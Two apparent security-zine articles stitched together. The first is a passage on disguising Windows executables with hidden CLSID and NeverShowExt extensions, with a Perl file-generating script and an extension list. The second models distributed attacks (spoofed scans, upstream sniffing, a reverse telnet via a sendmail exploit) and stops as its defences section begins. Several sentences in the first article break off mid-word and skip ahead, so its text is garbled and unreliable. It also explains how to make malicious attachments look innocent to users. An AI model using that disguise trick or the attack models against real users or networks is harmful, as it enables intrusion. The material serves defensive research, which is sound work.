    TEST~1   {9E       0 05-08-01  2:49p test.{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}
    TEST~1   {9C       0 05-08-01  2:53p test.{9CBBB803-D654-11D1-8818-C199198E9702}
    TEST~1   {94       0 05-08-01  2:55p test.{944d4c00-dd52-11ce-bf0e-00aa0055595a}
    TEST~1   {30       0 05-08-01  4:26p test.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
            11 file(s)              0 bytes
             2 dir(s)     580,976,640 bytes free

In Windows Explorer, the file names and the contents of the "Type" column are displayed as follows:

    Name                            Type
    test                            HTML Application
    test                            DirectDraw Property Page
    test                            SwiftSoft MMLEDPanelX Control
    test                            {9E56BE60-C50F-11CF-9A2C-00A0C90A90CE}
    test.Access.Application         APPLICATION File
    test.Access.ShortCut.Macro.1    1 File
    test.hta                        HTML Application
    test                            Shortcut to MS-DOS Program
    test.piffile                    PIFFILE File
    test.txt                        Microsoft HTML Document 5.0
    test.txt.html                   Microsoft HTML Document 5.0

It should also be noted that the icons associated with these files were the generic file icon, except for the following: test.{9E56BE60-C50F-11CF-9A2C-00A0C90A90CE} displays an envelope icon, as in e-mail software; test.pif has a little arrow on its icon, just like any shortcut; and the two files identified as Microsoft HTML Document 5.0 have the Internet Explorer icon. It should be pointed out that results may vary.

We can see that Windows Explorer readily accepts CLSID extensions, hiding them from view in the file name itself and translating them to the corresponding file type in the Type column.
This makes it even easier than with Shell Scraps to make dangerous files look innocent to the blindly trusting user, who probably has Windows Explorer set to "Small Icons" instead of "Details", with every other setting left at its default.

The ability to execute code

The ability to make a file look like a different type of file, by hiding the file's extension for example, was only the first aspect of the research project. For a virus to be viable, we also need to be able to run code. From the list of hidden extensions displayed in chapter 3, I wanted to find out which ones could be used to execute code, and therefore potentially to propagate a virus or other type of malware.

My point? That current mail filtering software that blocks certain types of attachments simply doesn't work. I never thought this method was a sufficient guard against viruses, since such software always blocks the same commonly used file extensions like .EXE, .COM, .VBS, .SHS, .DLL and the like. But these products weren't blocking .SHS before IRC/Stages.worm (Life Stages). And the same will happen when a virus uses one of the flaws described in this paper to propagate itself, mainly because of two things: 1) the products are not proactive, the

In fact, the CLSID vulnerability (let's call things by their real names) only makes the problem worse than I originally estimated. At the beginning of this project, I was worried that unknown file extensions could be used to fool people into clicking on a file and activating virulent code. Now, thanks to CLSIDs, we also have to worry about already known file extensions, as they too can be made invisible without even tinkering with the system (as opposed to the NeverShowExt registry key, which must be added to the registry in order to hide a "normal" extension) and go unblocked by filtering software (does your mail filtering agent block attachments of the {48123bc4-99d9-11d1-a6b3-00c04fd91555} type?).
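The filtering problem raised here can be illustrated with a short Python sketch. It is only an approximation of the behavior observed in this paper, not Explorer's actual logic: it assumes the name shown to the user is the real name minus a final CLSID or NeverShowExt-style extension. The extension set is copied from the list of hidden extensions in chapter 3, and the function names are made up for illustration.

```python
import re

# Extensions observed as hidden by default in this paper (chapter 3).
NEVER_SHOW = {"cnf", "lnk", "mad", "maf", "mag", "mam", "maq", "mar", "mas",
              "mat", "mav", "maw", "pif", "scf", "shb", "shs", "url", "xnk"}

# A CLSID used as an extension: {8-4-4-4-12 hex digits}
CLSID_EXT = re.compile(r"^\{[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.I)

def shown_name(filename):
    """Approximate the name a user sees when the last extension is hidden."""
    base, dot, ext = filename.rpartition(".")
    if dot and (ext.lower() in NEVER_SHOW or CLSID_EXT.match(ext)):
        return base
    return filename

def is_disguised(filename):
    """True when hiding the last extension leaves a different visible extension."""
    shown = shown_name(filename)
    return shown != filename and "." in shown

for name in ("test.txt.shs",
             "test.txt.{25336920-03F9-11cf-8FD0-00AA00686F13}",
             "test.shs.txt",
             "test.txt"):
    print(name, "->", shown_name(name), is_disguised(name))
```

A mail filter built on this idea would flag an attachment by what its name turns into on screen rather than by matching a fixed list of known-bad extensions, which is the weakness discussed above.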
To get an idea of how many system objects are defined by CLSIDs, check out the registry under [HKEY_CLASSES_ROOT\CLSID]. Just about every component of all the software you know about on your machine is there, and there are even more from software you probably didn't even know about. That means you

The "executability" of a given extension is a relative thing; what you can and cannot do varies from one file type to another. As one reader noted, there are different types of "executable files". The first and most common type is files containing code that is activated by the OS when the file is launched. This includes, but is not limited to, .EXE, .BAT, .COM, .VBS, .PL and the like. The second type closely resembles the first, but the code runs in a sandboxed environment instead of with full privileges. Such files would be .HTML, .PS and .JS. Then some extensions contain fully privileged executable code but cannot be run directly: .386, .ASP, .DLL, .DRV and .VXD. Finally, some files contain code that can be run in a sandboxed environment but cannot be executed directly from the OS. One such file type is .CSS. This research focuses mainly on the first type of files, but the other types can probably be used in some attack scenarios too. It's mostly a matter of ingenuity and imagination to find new ways to do old things :-)

The thing is to find out whether the extensions displayed in chapter 3 can be used to run code. I haven't done much testing on this topic yet (if you happen to experiment with it, let me know of your findings), but it would appear to be feasible. For example, .CNF (SpeedDial) could potentially be used to make a file that, once clicked on, would hang up the modem and make it call a number overseas for phone fraud purposes. Preliminary testing shows that the conditions needed for this scenario make it very improbable in the wild, but technically feasible.
But who knows what these other extensions hold? And when you consider that a lot of people are still gullible enough to click on a .TXT.VBS file, think what will happen when the .VBS part is concealed with .{B54F374

Conclusion

Unfortunately, I have not really discovered anything new here (although I wish I had, others explored these topics before me), but this paper puts in one place all there is to know about invisible file extensions on Windows, and how they can be exploited to convince a computer user to double-click on an executable file, be it to propagate a virus or to plant a trojan horse.

In light of what is presented here, it is also easy to see the uselessness of software that scans mail in order to block certain types of files while allowing others (for example, MailSweeper, MailSafe in ZoneAlarm, etc.). A more secure strategy would be to determine the allowed file types and block everything else, a bit like a firewall that allows specific protocols and blocks everything else. But the main reason why this type of product is useless against this type of attack is that Windows contains these flaws. When I think that the average user still clicks on any attachment he receives, concealed or

Appendix A. The Perl script

Originally, in order to solve my problem, I wrote a small Perl script that generates dummy files bearing all possible file extensions under Windows. I included special characters in my analysis, to be sure that nothing was overlooked. The program is displayed below. This version is for 3-character extensions; remove one or two loops to generate 2-character and 1-character extensions. For clarity of analysis, I sorted the files into folders named after the first character of the extension. This is necessary to get decent refresh times from Windows Explorer.
I also stopped at 3-letter extensions, since four-letter extensions would have generated too many combinations to look at, but that doesn't mean that they don't exist (.html, for example). The Perl script is provided here as reference material, and can be used or modified to repeat similar experiments.

    #!C:\perl
    use strict;
    use warnings;

    # Characters tried in each position of the extension (55 in total).
    my @alpha = ("a","b","c","d","e","f","g","h","i","j","k","l",
                 "m","n","o","p","q","r","s","t","u","v","w","x","y","z",
                 "0","1","2","3","4","5","6","7","8","9","\$","_",")",
                 "(","&","^","%","#","@","!","'","-","=","+",";","[","]",
                 "{","}");

    for my $first (@alpha) {
        # One folder per first character keeps Explorer refresh times decent.
        mkdir $first;
        chdir $first or die "Cannot enter folder '$first': $!";
        for my $second (@alpha) {
            for my $third (@alpha) {
                my $filename = "test." . $first . $second . $third;
                open(my $fh, '>>', $filename)
                    or die "Cannot create '$filename': $!";
                print $fh "bla";
                print "#";          # progress indicator
                close($fh);
            }
        }
        chdir "..";
    }

Appendix B. The file extensions list

Once these extensions were generated, I examined all 169 455 combinations through Windows Explorer, in order to determine how the system behaves towards these files. The vast majority of them turned out to be generic file extensions, meaning that no application is associated with them, and as such they present no harm as far as this research is concerned. So I proceeded to extract all file extensions that Windows knew something about, by examining the file icon and file description. Some of these extensions are native to the Windows operating system; others are the result of application software installed on my machine. For this reason, we can't call this list "the ultimate file extension list under Windows", since a system configured for different needs would have produced a different list. However, the list presented here is fairly complete and makes good reference material. Some application software also identifies some file extensions with the application name, instead of the more generi

This list is provided as is, and is only a by-product of my original research.
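As a quick sanity check on the figure of 169 455 combinations, the short Python sketch below (an illustration, not part of the original tooling) counts the extensions of 1, 2 and 3 characters that can be built from the script's 55-character alphabet. The function names are hypothetical.

```python
from itertools import product

# Same 55 characters as the @alpha array in the Perl script.
ALPHA = "abcdefghijklmnopqrstuvwxyz0123456789" + "$_)(&^%#@!'-=+;[]{}"

def count_extensions(max_len):
    """Count all extensions of length 1..max_len over ALPHA."""
    return sum(len(ALPHA) ** n for n in range(1, max_len + 1))

def extensions(length):
    """Generate every extension of exactly `length` characters."""
    for chars in product(ALPHA, repeat=length):
        yield "".join(chars)

print(len(ALPHA))            # 55
print(count_extensions(3))   # 55 + 55**2 + 55**3 = 169455
print(count_extensions(4))   # 9320080
```

Going from three to four characters multiplies the number of files by roughly 55, which is consistent with the decision to stop at three.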
There could be mistakes or omissions; if so, simply notify me and I will update the list accordingly. You can always check out the website http://filext.com for a more complete list.

    .323   H.323 Internet Telephony
    .386   Virtual Device Driver - Executable
    .669   WinAmp media file
    .aca   MS Agent Character file
    .acf   MS Agent Character file
    .acg   MS Agent Preview file
    .acs   MS Agent Character file
    .ade   MS Access Project Extension - Executable
    .adn   MS Access Blank Project Template - Executable
    .adp   MS Access Project - Executable
    .aif   Mac .aiff Sound Clip
    .ani   Animated Cursor
    .arc   PkArc DOS archive
    .arj   ARJ archive
    .art   ART image
    .asa   Active Server Document
    .asf   Streaming Audio/Video File
    .asp   Active Server Document - Executable
    .asx   Streaming Audio/Video shortcut - Executable
    .au    AU Format Sound
    .avi   Video clip
    .awd   Fax Viewer Document
    .b64   base64-encoded file
    .bas   Visual Basic Class Module - Executable
    .bat   MS-DOS Batch file - Executable
    .bhx   Mac BinHex-encoded file
    .bmp   Bitmap Image
    .c     C source code
    .cab   Windows proprietary archiver
    .cat   Security Catalog
    .cda   WinAmp media file
    .cdf   Channel File
    .cdx   Active Server Document
    .cer   Security Certificate
    .chm   Compiled HTML Help file - Executable
    .cil   Clip Gallery Download Package
    .cmd   Windows NT Command Script - Executable
    .cnf   SpeedDial (NeverShowExt) - Executable
    .com   MS-DOS Application - Executable
    .cpl   Control Panel extension - Executable
    .crl   Certificate Revocation List
    .crt   Security Certificate
    .css   Cascading Style Sheet Document - Executable
    .csv   MS Excel Comma Separated Values file
    .cur   Cursor
    .dcx   DCX Image Document
    .der   Security Certificate
    .dic   Text Document
    .dif   MS Excel Data Interchange Format
    .dll   Application Extension - Executable
    .doc   MS Word Document
    .dot   MS Word Template
    .dqy   MS Excel ODBC Query file
    .drv   Device Driver - Executable
    .dsm   WinAmp media file
    .dsn   MS OLE DB Provider for ODBC Drivers
    .dun   Dial-Up Networking Exported file
    .eml   Outlook Express Mail Message
    .exc   Text Document
    .exe   Application - Executable, by definition
    .far   WinAmp media file
    .fav   Outlook Bar Shortcuts
    .fdf   Adobe Acrobat Forms Document
    .fnd   Saved Search
    .fon   Font file
    .gfi   GFI File
    .gfx   GFX File
    .gif   GIF Image
    .gim   GIM File
    .gix   GIX File
    .gna   GNA File
    .gnx   GNX File
    .gra   MS Graph 2000 Chart
    .grp   MS Program Group
    .gwx   GWX File
    .gwz   GWZ File
    .gz    GNU zip
    .h     C definition code
    .hlp   Help File - Executable
    .hqx   Mac archiver file
    .ht    HyperTerminal file
    .hta   HTML Application - Executable
    .htm   MS HTML Document 5.0 - Executable
    .html  MS HTML Document 5.0 - Executable
    .htt   HyperText Template
    .htx   Internet Database Connector HTML Template
    .icc   ICC Profile
    .icm   ICC Profile
    .ics   iCalendar File
    .idf   MIDI Instrument Definition
    .iii   Intel IPhone Compatible
    .inf   Setup information - Executable
    .ini   Configuration Settings
    .ins   Internet Communication Settings - Executable
    .iqy   MS Excel Web Query File
    .isp   Internet Communication Setting - Executable
    .it    WinAmp media file
    .its   Internet Document Set
    .ivf   IVF File
    .job   Task Scheduler Task Object
    .jod   MS.Jet.OLEDB.4.0
    .jpe   JPEG Image
    .jpg   JPEG Image
    .js    JScript file - Executable
    .jse   JScript Encoded Script File
    .lnk   Shortcut (NeverShowExt) - Executable
    .lsf   Streaming Audio/Video file
    .lsx   Streaming Audio/Video shortcut
    .lwv   MS Linguistically Enhanced Sound File
    .lzh   LZH DOS archiver
    .m1v   Movie Clip
    .m3u   WinAmp Playlist file
    .mad   MS Access Module Shortcut (NeverShowExt) - Executable?
    .maf   MS Access Form Shortcut (NeverShowExt) - Executable?
    .mag   MS Access Diagram Shortcut (NeverShowExt) - Executable?
    .mam   MS Access Macro Shortcut (NeverShowExt) - Executable?
    .maq   MS Access Query Shortcut (NeverShowExt) - Executable?
    .mar   MS Access Report Shortcut (NeverShowExt) - Executable?
    .mas   MS Access StoredProcedure shortcut (NeverShowExt) - Executable?
    .mat   MS Access Table Shortcut (NeverShowExt) - Executable?
    .mav   MS Access View Shortcut (NeverShowExt) - Executable?
    .maw   MS Access Data Access Page Shortcut (NeverShowExt) - Executable?
    .mda   MS Access Add-in
    .mdb   MS Access Database - Executable
    .mde   MS Access MDE Database - Executable
    .mdn   MS Access Blank Database Template
    .mdt   MS Access Add-in data
    .mdw   MS Access Workgroup Information
    .mdz   MS Access Database Wizard Template
    .mht   MS MHTML Document 5.0
    .mid   MIDI file
    .mim   WinZip file
    .mmc   Medias Catalog
    .mod   MODplayer Media file
    .mov   Quicktime movie clip
    .mp1   MPEG1-audio file
    .mp2   MPEG2-audio file
    .mp3   MPEG3-audio file
    .mpa   MPEG Movie Clip
    .mpe   MPEG Movie Clip
    .mpg   MPEG Movie Clip
    .msc   MS Common Console Document - Executable
    .msg   Outlook Item
    .msi   Windows Installer Package - Executable
    .msp   Windows Installer Patch - Executable
    .mst   Visual Test Source Files - Executable
    .mtm   WinAmp Media file
    .nsc   NSC File (has an icon, probably associated with Media Player)
    .nws   Outlook Express News Message
    .oft   Outlook Item Template
    .opx   MS Organization Chart 2.0
    .oqy   MS Excel OLAP Query File
    .oss   Office Search
    .p10   Certificate Request
    .p12   Personal Information Exchange
    .p7b   PKCS #7 Certificates
    .p7m   PKCS #7 MIME Message
    .p7r   Certificate Request Response
    .p7s   PKCS #7 Signature
    .pcd   Photo CD Image - Executable
    .pcx   PCX Image Document
    .pdf   Adobe Acrobat Document
    .pfx   Personal Information Exchange
    .pgd   PGPDisk volume
    .pif   Shortcut to MS-DOS Program (NeverShowExt) - Executable
    .pko   Public Key Security Object
    .pl    Perl file - Executable
    .pls   Winamp Playlist file
    .png   PNG Image
    .pot   MS PowerPoint Template
    .ppa   MS PowerPoint Addin
    .pps   MS PowerPoint Slide Show
    .ppt   MS PowerPoint Presentation
    .prf   PICSRules File
    .ps    PostScript file - Executable
    .pwz   MS PowerPoint Wizard
    .py    Python file - Executable
    .qcp   QUALCOMM PureVoice File
    .qt    QuickTime Video Clip
    .que   Task Scheduler Queue Object
    .rat   Rating System File
    .reg   Registration Entries - Executable
    .rmf   Adobe Webbuy Plugin
    .rmi   MIDI Sequence
    .rqy   MS Excel OLE DB Query files
    .rtf   Rich Text Format
    .s3m   ScreamTracker3 Media file
    .scf   Windows Explorer Command (NeverShowExt, generic icon) - Executable?
    .scp   Dial-Up Networking Script
    .scr   Screen Saver File - Executable
    .sct   Windows Script Component - Executable
    .shb   Shortcut into a document (NeverShowExt) - Executable
    .shf   PGP Share
    .shs   Shell Scrap object (NeverShowExt) - Executable
    .sig   PGP Detached signature file
    .skr   PGP Private Keyring
    .slk   MS Excel SLK Data Import Format
    .snd   AU Format Sound
    .snp   Snapshot File
    .spa   Flash Movie
    .spc   PKCS #7 Certificates
    .spl   Shockwave Flash Object
    .sst   Certificate Store
    .sta   sta file (Eudora)
    .stl   Certificate Trust List
    .stm   WinAmp media file
    .swf   Shockwave Flash Object
    .swt   Generator Template
    .sys   System file
    .tar   TAR archive file
    .taz   gzipped TAR archive
    .tgz   gzipped TAR archive
    .tif   TIFF Image Document
    .ttf   TrueType Font file
    .txt   Text Document
    .tz    gzipped TAR archive
    .udl   MS Data Link
    .uls   Internet Location Service (generic icon) - Executable?
    .ult   Winamp media file
    .url   Internet Shortcut (NeverShowExt) - Executable
    .uu    UUencoded file
    .uue   UUencoded file
    .vb    VBScript File - Executable
    .vbe   VBScript Encoded Script File - Executable
    .vbs   VBScript Script File - Executable
    .vcf   vCard File
    .vcs   vCalendar File
    .voc   Winamp Medias file
    .vsd   VISIO 5 drawing
    .vss   VISIO 5 drawing
    .vst   VISIO 5 drawing
    .vsw   VISIO 5 drawing
    .vxd   Virtual device driver - Executable
    .wab   Address Book File
    .wav   Waveform audio file
    .wbk   MS Word Backup Document
    .wht   MS NetMeeting Whiteboard Document
    .wif   WIF Image Document
    .wiz   MS Word Wizard - Executable
    .wlg   Dr. Watson Log
    .wm    Windows Media Audio/Video File
    .wma   Windows media audio
    .wpd   WordPerfect file
    .wpz   Winamp extension installation file
    .wri   Write Document
    .wsc   Windows Script Component - Executable
    .wsf   Windows Script File - Executable
    .wsh   Windows Scripting Host Settings File - Executable
    .wsz   Winamp extension installation file
    .xif   XIF Image Document
    .xla   MS Excel Add-in
    .xlb   MS Excel Worksheet
    .xlc   MS Excel Chart
    .xld   MS Excel 5.0 DialogSheet
    .xlk   MS Excel Backup File
    .xll   MS Excel XLL
    .xlm   MS Excel 4.0 Macro
    .xls   MS Excel Worksheet
    .xlt   MS Excel Template
    .xlv   MS Excel VBA Module
    .xlw   MS Excel Workspace
    .xm    ScreamTracker media file
    .xml   XML Document
    .xnk   Exchange Shortcut (NeverShowExt) - Executable?
    .xsl   XSL Stylesheet
    .xxe   XXencoded file
    .z     Compressed file
    .z0    Z0 file (ZoneAlarm)
    .z1    Z1 file (ZoneAlarm)
    .zip   Zipped file
    .ZL?   ZoneAlarm Mailsafe Renamed File

ZoneAlarm Mailsafe quarantines mail attachments and changes their extensions. The conversions are:

    .ADE to .ZL0    .ADP to .ZL1    .BAS to .ZL2    .BAT to .ZL3
    .CHM to .ZL4    .CMD to .ZL5    .COM to .ZL6    .CPL to .ZL7
    .CRT to .ZL8    .EXE to .ZL9    .HLP to .ZLA    .HTA to .ZLB
    .INF to .ZLC    .INS to .ZLD    .ISP to .ZLE    .JS  to .Z0
    .JSE to .ZLF    .LNK to .ZLG    .MDB to .ZLH    .MDE to .ZLI
    .MSC to .ZLJ    .MSI to .ZLK    .MSP to .ZLL    .MST to .ZLM
    .PCD to .ZLN    .PIF to .ZLO    .REG to .ZLP    .SCR to .ZLQ
    .SCT to .ZLR    .SHS to .ZLS    .URL to .ZLT    .VB  to .Z1
    .VBE to .ZLU    .VBS to .ZLV    .WSC to .ZLW    .WSF to .ZLX
    .WSH to .ZLY

===========[ Strategies for Defeating Distributed Attacks ]=============

--- by Simple Nomad ---

Abstract

With the advent of distributed Denial of Service (DoS) attacks such as Trinoo, TFN, TFN2K and stacheldraht [1], there is an extreme interest in finding solutions that thwart or defeat such attacks. This paper tries to look not just at distributed DoS attacks but at distributed attacks in general. The intent is not to devise or recommend protocol revisions, but to come up with usable solutions that could be implemented at a fairly low cost.
This paper is also written with the idea that probably 90% of the problems surrounding distributed attacks can be easily solved, with the last 10% requiring some type of long-range strategy or new code to be written.

Basics About Attack Recognition

How does one recognize an attack? Not just a Denial of Service attack, but any attack? Before we can start applying solutions, we need to discuss attack recognition techniques. So let's first look at the two main methods of attack recognition: pattern recognition and effect recognition.

Pattern recognition looks for a measurable quality of the attack in a file, a packet, or in memory. Looking for file size increases of 512 bytes or seeing a certain byte sequence in RAM are two simple examples of pattern recognition. Looking for the string "phf.cgi" in web traffic might be a simple method used by a network-based Intrusion Detection System (IDS).

Effect recognition is recognizing the effects of an attack. An example might be specific log file entries, or an "unscheduled" system reboot.

In intrusion detection, pattern recognition is the only method used by network-based IDS, while both pattern and effect recognition can be found in host-based IDS. And herein lies the crux of the problem: attack methods are calling for effect recognition methods to be applied to network-based IDSes, and the technology just isn't there. See [2], [3].

Pattern recognition alone has problems to begin with. If the attacker alters a pattern that is being checked for, such as a key word or byte sequence, then the IDS will miss it. For over a year it has been common knowledge that by dividing up an attack sequence into fragmented packets, you can defeat most IDSes. In fact, a majority of commercial IDSes are still unable to process fragmented IP packets [4]. Now couple this with the fact that effect recognition technology for network-based IDSes is virtually non-existent, and you can see the problem.
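The weakness of naive pattern recognition can be shown with a toy example. The Python sketch below is a deliberately simplified model and does not reflect how any real IDS or IP stack works: packets are plain byte strings, "fragmentation" is just slicing, and all function names are hypothetical. It shows a per-packet signature match missing the "phf.cgi" string once the payload is split, while matching on the reassembled stream still finds it.

```python
SIGNATURE = b"phf.cgi"

def fragment(payload, size):
    """Split a payload into consecutive chunks of at most `size` bytes."""
    return [payload[i:i + size] for i in range(0, len(payload), size)]

def match_per_packet(packets):
    """Naive check: look for the signature inside each packet separately."""
    return any(SIGNATURE in p for p in packets)

def match_reassembled(packets):
    """Reassemble first, then look for the signature in the whole stream."""
    return SIGNATURE in b"".join(packets)

request = b"GET /cgi-bin/phf.cgi HTTP/1.0\r\n\r\n"
whole = [request]
pieces = fragment(request, 8)   # the signature now straddles two chunks

print(match_per_packet(whole))      # True
print(match_per_packet(pieces))     # False
print(match_reassembled(pieces))    # True
```

Reassembly only addresses this one evasion; a pattern that the attacker changes outright is still missed, which is the broader point made above.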
If an attack is a one-time network event, your network-based IDS stands a chance of detecting it, but a sustained series of network events will be even more difficult to detect, especially if the events are disguised to look like normal network traffic.

Distributed DoS attack tools such as stacheldraht will leave definite patterns that can be searched for on the network. But attackers can modify the source code of the tools, causing a different pattern to be produced. If they do this, the IDS will not detect the new pattern.

What we need is an Overall Behavior Network Monitoring Tool that can look at logs on different systems from different vendors, sniff realtime network traffic, and logically determine bizarre or abnormal behavior (and alert us). Unfortunately, there *is* no such tool, so we need to make use of the tools we have (firewalls, IDS, etc.) in a way that will thwart or at least notify us about potential distributed network attacks. We will discuss such strategies in this paper.

Definition of the Attack Model

Before we start defining attack models, it should be noted that a number of the attack models discussed here are theoretical. To prevent confusion we will not differentiate between the real and the theoretical. Our discussion here centers around the overall concept of a distributed attack, real and theoretical, and tries to solve for the concept instead of specific attacks.

There are two basic models of attack. In the first, the attacker does not need to see the results. In the second, the attacker *does* need to see the results. Distributed DoS attacks are good examples of attacks where the attacker does not need to see the results, and since this simplifies our attack model, we will examine that model first.

Distributed attacks have one interesting element in common. Typically someone else's system is used to perform fairly critical tasks to meet the objective.
The flow of action is usually like so:

Figure 1:

 *--------*     *--------*     *-------*
 |        |     |        |     |       |
 | client |---->| server |---->| agent |
 |        |     |        |     |       |
 *--------*     *--------*     *-------*
   issues        processes      carries
   commands      command        out commands
                 requests
                 to agents

There can be multiple servers, and hundreds of agents. The usual deployment involves installing servers and agents on compromised systems, in particular installing the agents on systems with a lot of bandwidth.

To help prevent detection and tracing back to the attacker directing the activities, commands are typically issued using encryption, with ICMP as a transport mechanism. Encryption at least helps hide the activities from sniffers being used by administrators, although it does not preclude detection by other means. The packets used in part of the communications by such products as TFN2K and stacheldraht can be encrypted, which keeps the rogue packets from casual detection by a sniffer or IDS.

While the model for hostile behavior that does not require viewing of the results or "return packets" is in reality a little more complex than the model I've outlined, the model for hostile behavior that *does* require viewing of the results or "return packets" is a lot more complex [5]. For the sake of brevity, we will only cover possible techniques that help hide the attacker's source address and/or use maximum stealth techniques, including theoretical ones such as traffic pattern masking and upstream sniffing [6].

We will divide the more complex scenario of "the attacker seeing the results" into three categories (enumeration of targets, host and host service(s) identification, and actual penetration) and outline each category.

Enumeration: This is the act of determining what hosts are actually available for potential probing and attack.
Enumeration example 1, figure 2:

*----------*                                 *---------*
|          |  NMap forged ICMP_ECHO packets  |         |
| attacker |-------------------------------->| targets |
|          |            ---------------------|         |
*----------*           /                     *---------*
     |                /
   ngrep      target replies to forged source
     |             /
     <-------------

This first enumeration example is fairly simple: the attacker sends forged ICMP_ECHO packets and sniffs the replies destined for the forged source address. This can be readily accomplished using tools such as NMap [7] and ngrep [8], as long as the attacking host is upstream from the target network.

Enumeration example 2, figure 3:

                                         *---*
                                         | f |
                                         | i |
                                         | r |
*----------*                             | e |   *---------*
|          | forged ICMP_TSTAMP packets  | w |   |         |
| attacker |-----------------------------| a |-->| targets |
|          |             ----------------| l |---|         |
*----------*            /                | l |   *---------*
     |                 /                 *---*
   snort     target replies to forged source(s)
     |              /
     <--------------

This second example of enumeration is also fairly simple. Assuming the firewall is blocking ICMP_ECHO, we decide to send ICMP_TSTAMP packets with forged addresses. Instead of ngrep, in this example we use an IDS product called snort [9]. Snort is configured to capture the ICMP_TSTAMPREPLY packets. Once again we are assuming the attacking host is upstream of the target network.

Now we move on to host and host service identification.

Host/Host Services Identification example 1, figure 4:

                                         *---*
                                         | f |
                                         | i |
                                         | r |
*----------* NMap forged source address  | e |   *---------*
|          | with source port of 80      | w |   |         |
| attacker |-----------------------------| a |-->| targets |
|          |             ----------------| l |---|         |
*----------*            /                | l |   *---------*
     |                 /                 *---*
   snort     target replies to forged source
     |              /
     <--------------

In figure 4, port and OS identification scans are done against targets behind a firewall by taking advantage of the fact that SYN/ACKs with a source port of 80 are allowed through.
Because the packets are mistaken for web traffic, the IDS and the firewall are bypassed and the targets are scanned. Using a list of valid hosts obtained via host enumeration techniques, only valid targets are scanned. Forging the source address helps hide the true source of the scan. Reply packets are recovered via snort.

Figure 4 outlines a poorly configured firewall (or even a simple packet filtering ruleset on a router), so we will look at something a little more sophisticated.

Host/Host Services Identification example 2, figure 5:

     *----------*
     |          |
  /->| attacker |----------
  |  |          |          \
  |  *----------*           |
  |       |                 |
  |       |                 |
  |       v                 v
  |  *---------*       *---------*
  |  |         |       |         |
  |  | client1 |--     | client2 |--
  |  |         |  \    |         |  \        *---*
  |  *---------*   \   *---------*   \       | f |
  |       |         \                 \      | i |
  |       v          \                 \     | r |   *---------*
  |  *---------*      \                 -----| e |-->|         |
  |  |         |       ----------------------| w |-->| various |
  |  | client3 |-----------------------------| a |-->| targets |
  |  |         |             ----------------| l |---|         |
  |  *---------*            /                | l |   *---------*
  |                        /                 *---*
  |  *---------*          /
  |  |         |         /
  \->| sniff   |--------/
     | results |       /
     |         |      /
     *---------*     /
                    /  <-----------------
                   /  <---------------
                  /  <-------------

Figure 5 is one of the more complex models. This involves multiple clients directed by a master, performing slow methodical port scans of the target network. All of the port scans are using forged addresses from trusted sources whose IP addresses are allowed through the firewall. An upstream sniffer captures the replies. The clients and sniffer could even reside on hosts belonging to the trusted sources, and perhaps even be allowed through a VPN. This type of scenario is rather complex due to the lack of custom software needed to perform the scans, although various existing products could be modified to handle most of the elements involved.

When discussing actual attacks, in particular distributed attacks, the best path into a network is the path you know works.
Therefore the main line of attack will more than likely involve Figures 4 and 5, with a few possible modifications.

Actual Penetration, example 1, figure 6:

                                           *---*
                                           | f |
                                           | i |
                                           | r |
  *----------* Sploit to remotely set up a | e |   *---------*
  |          | reverse telnet via port 25  | w |   |         |
  | attacker |-----------------------------| a |-->| targets |
  |          |             ----------------| l |---|         |
  *----------*            /                | l |   *---------*
                         /                 *---*
                Return of reverse telnet
  *----------*  output on port 80
  |          |        /
  | listener |<-------
  |          |
  *----------*

In this example an exploitable sendmail daemon was found on a system that didn't really need sendmail running, and since sendmail was running as root, a reverse telnet was set up [10].

Actual Penetration, example 2, figure 7:

     *----------*
     |          |
  /->| attacker |----------
  |  |          |          \
  |  *----------*           |
  |       |                 |
  |       |                 |
  |       v                 v
  |  *---------*       *---------*
  |  |         |       |         |
  |  | client1 |--     | client2 |--
  |  |         |  \    |         |  \        *---*
  |  *---------*   \   *---------*   \       | f |
  |       |         \                 \      | i |
  |       v          \                 \     | r |   *---------*
  |  *---------*      \                 -----| e |-->|         |
  |  |         |       ----------------------| w |-->| various |
  |  | client3 |-----------------------------| a |-->| targets |
  |  |         |             ----------------| l |---|         |
  |  *---------*            /                | l |   *---------*
  |                        /                 *---*
  |  *---------*          /
  |  |         |         /
  \->| sniff   |--------/
     | results |       /
     |         |      /
     *---------*     /
                    /  <-----------------
                   /  <---------------
                  /  <-------------

In figure 7 the attacker directs attacks against targets via the clients to try to compromise various daemons to run arbitrary commands as root. Results are sent to forged IP addresses, but a sniffer captures these results. If logging or a host-based IDS picks up the activity, the attacker is not suspected; the owners of the forged IP addresses are.

Patterns of Attack

At first glance, it may seem easy to defend against the onslaught of attacks, probes, and enumeration techniques. But it must be remembered that byte pattern recognition or traffic on certain source and destination ports can easily be changed by the attacker.
A lot of the techniques outlined above can and will use encryption, can potentially operate over TCP, UDP, and/or ICMP, and can use different source and destination ports.

In particular let's look at figures 5 and 7 above. These are complex scenarios, but could conceivably be carried out, especially from a trusted host or network. The VPN is often considered a security tool, and its use is considered adequate in helping secure a channel. But all a VPN does is ensure that a communications link can be established, with the communications link itself being somewhat secure. The end points are critical - if you have established a VPN with a business partner or field office, you are only as secure as that remote site's computer systems. Does your business partner or remote office keep updated and patched as often as you do? Does your vendor have a security policy in place? Have you even asked your business partner or vendor these questions?

It is also possible that during upstream sniffing sessions an attacker could determine that, due to relationships with certain vendors, you have rules through the firewall based entirely upon IP address and/or hostname. These can and will be exploited if uncovered, either through the trusted vendor or by spoofing and sniffing as outlined in the above models.

However we *can* look at the above attack models and make some general determinations.

- All attacks involve possible covert communication methods between the attacker and the attacking/probing device.

- When possible, traffic is disguised to look like normal network traffic.

- When possible, IP addresses will be spoofed to mask the location of attacker, attack clients, probing machines, and/or to implicate a third party in case of accidental discovery.

Primary Defensive Techniques

Let's first look at the easy-to-do defenses that can be put in place. First off we need to eliminate as many unwanted forms of traffic through the firewall as possible.
